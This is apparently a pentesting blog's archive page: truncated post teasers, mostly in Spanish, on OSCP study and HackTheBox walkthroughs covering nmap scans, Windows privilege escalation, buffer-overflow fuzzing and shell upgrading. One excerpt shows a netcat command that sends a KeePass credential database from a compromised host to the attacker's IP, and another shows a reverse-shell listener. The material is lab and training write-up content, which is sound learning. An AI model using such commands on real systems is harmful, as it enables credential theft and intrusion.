by Ric | Apr 18, 2020 | Blog, Herramientas / tools, OSCP
La semana pasada tuve que trabajar con un windows viejo. No tenía powershell y por motivos de la vida no podia usar tampoco meterpreter. Que te queda en la vida cuando tienes que transferir archivos? Lo lógico es wget.exe pero aja como pasas wget.exe? Script a manita,...
by Ric | Feb 7, 2020 | OSCP
Hi, so this is my fourth blog post about my OSCP journey. I have to tell you that I feel so relieved and happy that I passed it on my first attempt. How was it? First I took the official offensive security live course: OSCP – Pentesting with Kali Live one week...
by Ric | Jan 19, 2020 | Blog, Herramientas / tools, OSCP
Vamos a ver tres métodos para hacer privilege escalation en windows. 1.- Cuando tenemos permiso para escribir en algun folder donde hay algun servicio que empieza automáticamente o que lo podemos reiniciar o lo podemos DOS y windows lo reinicia automaticamente 2 .-...
by Ric | Jan 13, 2020 | Blog, Herramientas / tools, OSCP
SNMP significa Simple Network Management Protocol. Sirve para intercambiar instrucciones o configuraciones entre dispositivos. SNMP puede tener leer commands o escribir commands. SNMP viene en tres versions SNMP1 Es el mas vulnerable y todo lo maneja en plaintext...
by Ric | Jan 13, 2020 | Blog, Herramientas / tools, OSCP
Asumire que todos sabemos que es powershell pero en resumen es una shell que se encuentra en windows 7 para adelante. Pero cuales son sus ventajas para un pentester? Powershell puede descargar y ejecutar codigo desde la memoria. Lo cual es bueno porque no deja tanto...
by Ric | Nov 24, 2019 | Blog, Herramientas / tools, OSCP
Pasar archivos de Linux (Kali) a Windows puede ser un problema durante un pentest. Claramente no puedes solo llegar con un USB ja. Hoy les mostraré mi método favorito. Usaremos Impacket más concretamente “impacket-smbserver” para hacer un share desde donde...
by Ric | Nov 23, 2019 | Herramientas / tools, OSCP
Preguntas iniciales. Qué arquitectura de Windows es? 32? 1 Replica el crash https://lingojam.com/ByteCounter 2 Velo en Wirershark y en el debugger 3 Replicalo en python con el fuzzer para encontrar el numero del crash #!/usr/bin/env python2 import socket # Generate an...
by Ric | Nov 21, 2019 | Herramientas / tools, OSCP
Cuando estas haciendo el buffer overflow the OSCP tienes que encontrar Bad characters. He escuchado que mucha gente se le complica este paso porque lo hace manualmente. Gracias a Mona hay una forma de hacerlo “semi automático”. Primero, haz un script para...
by Ric | Nov 15, 2019 | Blog, OSCP
Day 5 Ok so i finished my course and got my diploma 🤓. What did we did today? We start at 9 am sharp. After doing the CTF for +8 hours yesterday (after midnight) It was a rough day. They said from the beginning that today was the day of questions but finally they...
by Ric | Nov 11, 2019 | Blog, OSCP
Day one The day one of the official LIVE PWK OSCP course is here. I was super excited. We arrived and we were greeted by some nice million page manual printed in color (that was very nice) to a room with other 15 people. There was no typical introduction (whats your...
by Ric | Nov 10, 2019 | Blog, OSCP
DAY 0 OSCP – Pentesting with Kali Live one week training review When you start studying for your OSCP you have two big choices. Doing it by yourself with an online course or doing a live course. This is a review of the Live Course. Im writing this one because...
by Ric | Nov 4, 2019 | Blog, Herramientas / tools, OSCP
Ya había hecho esta maquina pero con mucho mucho Metasploit. La verdad es que solo para OSCP tiene sentido no usar metasploit para eternal blue ha. Lo bueno es que descubrí un script que es casi igual de maravilloso. Como siempre empezamos con un nmap (en este caso...
by Ric | Nov 3, 2019 | Blog, Herramientas / tools, OSCP
Esta es la segunda vez que hago esto pero esta vez sin metasploit. Lo primero que nos damos cuenta con el nmap es que esta FTP con acceso anónimo y el asp root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-03 19:39...
by Ric | Nov 3, 2019 | Herramientas / tools, OSCP
Siempre que corro watson o busco en google Systeminfo de windows es un dolor de cabeza encontrar priv escalation. https://github.com/abatchy17/WindowsExploits pero esta pagina tiene bastantes aunque solo debes correrlos en CTF sistems. Nunca en clientes ja 🙂 MS03-026...
by Ric | Nov 2, 2019 | Blog, Herramientas / tools, OSCP
Esta maquina funciona con Windows. Hay que tener mucho cuidado con el encoding. No me estaba funcionando por eso. Como siempre empezamos con un Nmap root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET Nmap...
by Ric | Oct 27, 2019 | Blog, OSCP
Como siempre empezamos con NMAP root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-27 14:04 CET Nmap scan report for 10.10.10.24 Host is up (0.031s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp...
by Ric | Oct 27, 2019 | Blog, Herramientas / tools, OSCP
Hay algunas veces que la shell que tenemos esta muy limitada y no podemos hacer cosas como usar las flechitas, no hay tab ni su. Ahora como arreglarlo? Si la maquina tiene python es sencillo root@Kali2:~/Desktop# nc -lvnp 1234 listening on [any] 1234 … connect...
by Ric | Oct 26, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de las boxes más complejas que he hecho. Sobretodo porque no tengo tanta experiencia en windows. Como siempre empezamos con un Nmap root@Kali2:~# nmap -p 9255,9256 -sC -sV 10.10.10.74 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-25 16:11 CEST...
by Ric | Oct 22, 2019 | Blog, Herramientas / tools, OSCP
Como siempre comenzamos con un nmap pero no hay mucho 80 y 443. Como es una web application corremos dirbuster. En este caso con una extension que no uso normalmente txt. Eso encuentra el archivo https://10.10.10.60/system-users.txt ####Support ticket### Please create...
by Ric | Oct 21, 2019 | Blog, Herramientas / tools, OSCP
Este ya lo había hecho pero usando metasploit. Una vez descubrimos la version de Nibbleblog podemos encontrar la vulnerabilidad en internet. En resumen, podemos subir imagenes sin filtros de tipo. Por lo que podemos subir un PHP sin problema. Lo que es más interesante...
by Ric | Oct 21, 2019 | Blog, OSCP
Esta fue una maquina interensante pero estuvo muy fácil y sin MSF 🙂 Empezamos con un nmap (sparta) Como solo había un webserver use dirbuster medium. Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / – 200 Dir found:...
by Ric | Oct 20, 2019 | Blog, Herramientas / tools, OSCP
Es el mejor invento del año. Agarraron la descripción de todos los videos de IppSec y los indexaron. Por ejemplo, si te encuentras kdbx y no sabes que es puedes verlo en videos. Lo mejor es que los links te llevan diréctamnete a ellos. https://ippsec.rocks...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Lo transferimos de windows a linux con: C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx Lo recibimos con root@Kali2:~/Downloads# nc -lp...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Como siempre empezamos con un NMAP, lo más obvio raro es el puerto 5000 Jenkins. Nmap scan report for 10.10.10.63 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de mis maquinas favoritas. Aprendí mucho y estuvo muy interesante. Como siempre empezamos con un Nmap rápido root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.51 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 16:12 CEST Nmap scan report for...